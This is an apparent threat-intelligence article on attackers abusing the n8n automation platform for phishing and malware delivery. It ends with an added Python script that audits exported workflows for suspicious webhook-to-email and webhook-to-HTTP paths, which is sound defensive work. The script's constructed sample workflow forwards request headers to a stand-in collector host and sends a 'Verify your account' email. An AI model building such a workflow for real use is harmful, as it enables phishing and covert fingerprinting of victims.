ZCyberNews
Threat Intel | High

Threat Actors Weaponize n8n Workflow Platform for Phishing and Payload Delivery

Attackers have been abusing the legitimate n8n workflow automation platform since October 2025 to send phishing emails and deliver malware, leveraging its trusted infrastructure to bypass email security filters.

Executive Summary

Threat actors have been actively weaponizing the legitimate n8n workflow automation platform to conduct phishing campaigns and deliver malware since at least October 2025. By abusing n8n's webhook and email automation features, attackers send malicious emails from the platform's own trusted infrastructure, effectively bypassing traditional email security filters that rely on sender reputation. This technique represents a significant evolution in phishing operations, turning a widely used productivity and AI integration tool into a potent attack vector.

Technical Analysis

The attack chain begins with threat actors compromising n8n instances, either by deploying their own or potentially exploiting misconfigured or vulnerable public instances. According to The Hacker News, the attackers configure n8n workflows that are triggered by incoming webhooks. These workflows are designed to send automated emails containing phishing lures or links to malicious payloads. The emails originate from n8n's infrastructure, which typically has a high sender reputation score, allowing them to evade spam filters and Domain-based Message Authentication, Reporting and Conformance (DMARC) checks.

Once a recipient interacts with the email—by clicking a link or opening an attachment—the workflow can execute subsequent actions. These include delivering malware directly or redirecting the victim to credential-harvesting pages. The n8n platform can also be used to fingerprint visiting devices by collecting HTTP request headers and other telemetry sent via the webhook, providing reconnaissance data to the attackers. The specific malware families delivered via this method have not been detailed in the available source.

Tactics, Techniques & Procedures

The primary technique observed is the abuse of legitimate cloud services and software-as-a-service (SaaS) platforms for offensive operations (T1584.006). This falls under the broader tactic of Resource Development. Specifically, attackers are:

  • Using trusted infrastructure (n8n's email servers) to send phishing emails, bypassing reputation-based filtering.
  • Automating spear-phishing payload delivery via configured workflows (T1566).
  • Possibly exploiting public-facing applications (T1190) if they are compromising unsecured n8n instances, though the initial access vector for the attackers' own n8n setup is not confirmed.
  • Gathering victim host information through webhook-triggered fingerprinting workflows (T1592).

Threat Actor Context

The source material does not attribute this activity to a known threat actor group. The operational pattern suggests financially motivated actors or initial access brokers seeking to establish footholds in target networks. The use of a legitimate automation tool indicates a moderate level of sophistication, focusing on operational security (OpSec) and efficacy rather than novel malware development.

Mitigations & Recommendations

Organizations should implement a defense-in-depth strategy to counter this threat:

  1. Email Security: Augment traditional reputation-based filtering with content analysis, URL inspection, and attachment sandboxing. Train users to be suspicious of unexpected emails, even from known SaaS platforms.
  2. Network Monitoring: Monitor outbound connections to n8n cloud infrastructure (n8n.cloud) from corporate endpoints, as this could indicate a compromised internal n8n instance or a user interacting with a malicious workflow.
  3. n8n Instance Hardening: For organizations using n8n, ensure instances are not publicly exposed without authentication. Implement strict access controls, audit workflow logs for suspicious activity, and disable unnecessary email-sending capabilities if not required.
  4. Endpoint Protection: Deploy robust endpoint detection and response (EDR) solutions capable of detecting post-exploitation activity and payload execution, regardless of the initial delivery vector.
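As an added example supporting recommendation 3 (it is not code from the article or from the n8n project), the script below audits an exported n8n workflow for the pattern described in the Technical Analysis: a webhook trigger that can reach an email- or HTTP-sending node, optionally forwarding the inbound request headers. It assumes n8n's export layout of a `nodes` list plus a `connections` map keyed by source node name, and the node type strings listed in `OUTBOUND_SINKS`; the sample workflow is constructed for illustration.

```python
import json
from collections import deque

# n8n node type names as they appear in workflow exports (assumed here; extend for your node set).
WEBHOOK_TRIGGER = "n8n-nodes-base.webhook"
OUTBOUND_SINKS = {"n8n-nodes-base.emailSend": "email", "n8n-nodes-base.gmail": "email",
                  "n8n-nodes-base.httpRequest": "http"}

def audit_workflow(workflow):
    """List every webhook trigger that can reach an email- or HTTP-sending node."""
    nodes = {n["name"]: n for n in workflow.get("nodes", [])}
    adj = {}  # flatten n8n's connections map into source -> [targets]
    for src, outputs in workflow.get("connections", {}).items():
        for branch in outputs.get("main", []):
            adj.setdefault(src, []).extend(e["node"] for e in (branch or []))
    findings = []
    for trig in (n["name"] for n in nodes.values() if n["type"] == WEBHOOK_TRIGGER):
        queue, seen = deque([[trig]]), {trig}
        while queue:  # breadth-first walk from the trigger, recording the path to each sink
            path = queue.popleft()
            node = nodes.get(path[-1])
            if node and node["type"] in OUTBOUND_SINKS:
                params = json.dumps(node.get("parameters", {}))
                findings.append({"trigger": trig, "sink": node["name"],
                                 "kind": OUTBOUND_SINKS[node["type"]], "path": path,
                                 # expressions reading the request headers hint at device fingerprinting
                                 "uses_request_headers": "headers" in params})
            for nxt in adj.get(path[-1], []):
                if nxt not in seen:
                    seen.add(nxt)
                    queue.append(path + [nxt])
    return findings

# Constructed sample export (not a real workflow): Webhook -> Set -> Send Email, plus Webhook -> Beacon.
SAMPLE = {
    "nodes": [
        {"name": "Webhook", "type": "n8n-nodes-base.webhook", "parameters": {"path": "intake"}},
        {"name": "Set", "type": "n8n-nodes-base.set", "parameters": {}},
        {"name": "Send Email", "type": "n8n-nodes-base.emailSend",
         "parameters": {"toEmail": "={{ $json.body.email }}", "subject": "Verify your account"}},
        {"name": "Beacon", "type": "n8n-nodes-base.httpRequest",
         "parameters": {"url": "https://collector.example/log", "body": "={{ $json.headers }}"}},
    ],
    "connections": {
        "Webhook": {"main": [[{"node": "Set", "type": "main", "index": 0},
                               {"node": "Beacon", "type": "main", "index": 0}]]},
        "Set": {"main": [[{"node": "Send Email", "type": "main", "index": 0}]]},
    },
}
```

Running `audit_workflow(SAMPLE)` returns two findings, the email sink reached through `Set` and the HTTP sink that reads request headers; point it at each workflow in an `n8n export:workflow` dump to triage a whole instance.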
